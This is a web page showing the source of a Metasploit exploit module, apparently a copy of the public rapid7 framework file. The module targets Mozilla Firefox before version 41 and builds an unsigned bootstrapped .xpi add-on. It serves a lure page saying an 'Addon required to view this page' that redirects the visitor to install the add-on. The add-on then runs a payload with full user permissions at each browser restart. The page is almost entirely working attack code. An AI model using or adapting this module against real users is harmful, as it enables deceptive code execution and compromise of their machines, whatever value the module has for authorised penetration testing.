Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45require 'rex/zip'67class MetasploitModule < Msf::Exploit::Remote8Rank = ExcellentRanking910include Msf::Exploit::Remote::HttpServer::HTML11include Msf::Exploit::Remote::FirefoxAddonGenerator1213def initialize( info = {} )14super( update_info( info,15'Name' => 'Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution',16'Description' => %q{17Mozilla Firefox before version 41 allowed users to install18unsigned browser extensions from arbitrary web servers.1920This module dynamically creates an unsigned .xpi addon file.21The resulting bootstrapped Firefox addon is presented to22the victim via a web page. The victim's Firefox browser23will pop a dialog asking if they trust the addon.2425Once the user clicks "install", the addon is installed and26executes the payload with full user permissions. As of Firefox274, this will work without a restart as the addon is marked to28be "bootstrapped". As the addon will execute the payload after29each Firefox restart, an option can be given to automatically30uninstall the addon once the payload has been executed.3132As of Firefox 41, unsigned extensions can still be installed33on Firefox Nightly, Unbranded and Development builds when34configured with `xpinstall.signatures.required` set to `false`.3536Note: this module generates legacy extensions which are37supported only in Firefox before version 57.38},39'License' => MSF_LICENSE,40'Author' => [ 'mihi', 'joev' ],41'DisclosureDate' => '2007-06-27',42'References' => [43[ 'URL', 'https://blog.mozilla.org/addons/2015/02/10/extension-signing-safer-experience/' ],44[ 'URL', 'https://blog.mozilla.org/addons/2015/04/15/the-case-for-extension-signing/' ],45[ 'URL', 'https://support.mozilla.org/en-US/kb/frequently-asked-questions-firefox-addon' ],46[ 'URL', 'https://web.archive.org/web/20170727035940/https://developer.mozilla.org/en-US/Add-ons/Bootstrapped_extensions' ],47[ 'URL', 'https://web.archive.org/web/20160322014439/https://dvlabs.tippingpoint.com/blog/2007/06/27/xpi-the-next-malware-vector' ]48],49'Notes' => {50'Reliability' => [REPEATABLE_SESSION],51'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK, SCREEN_EFFECTS],52'Stability' => [CRASH_SAFE]53}54))55end5657def on_request_uri(cli, request)58if request.uri.match(/\.xpi$/i)59# browser has navigated to the .xpi file60print_status("Sending xpi and waiting for user to click 'accept'...")61if not xpi = generate_addon_xpi(cli)62print_error("Failed to generate the payload.")63send_not_found(cli)64else65send_response(cli, xpi.pack, { 'Content-Type' => 'application/x-xpinstall' })66end67else68# initial browser request69# force the user to access a directory-like URL70if not request.uri.match(/\/$/)71print_status("Redirecting request." )72send_redirect(cli, "#{get_resource}/")73else74# user has navigated75print_status("Sending HTML response." )76send_response_html(cli, generate_html)77end78end7980handler(cli)81end8283def generate_html84html = %Q|<html><head><title>Loading, Please Wait...</title>\n|85html << %Q|<meta http-equiv="refresh" content="0; url=addon.xpi"></head>\n|86html << %Q|<body><center><p>Addon required to view this page. <a href="addon.xpi">[Install]</a></p></center>\n|87html << %Q|</body></html>|88return html89end90end919293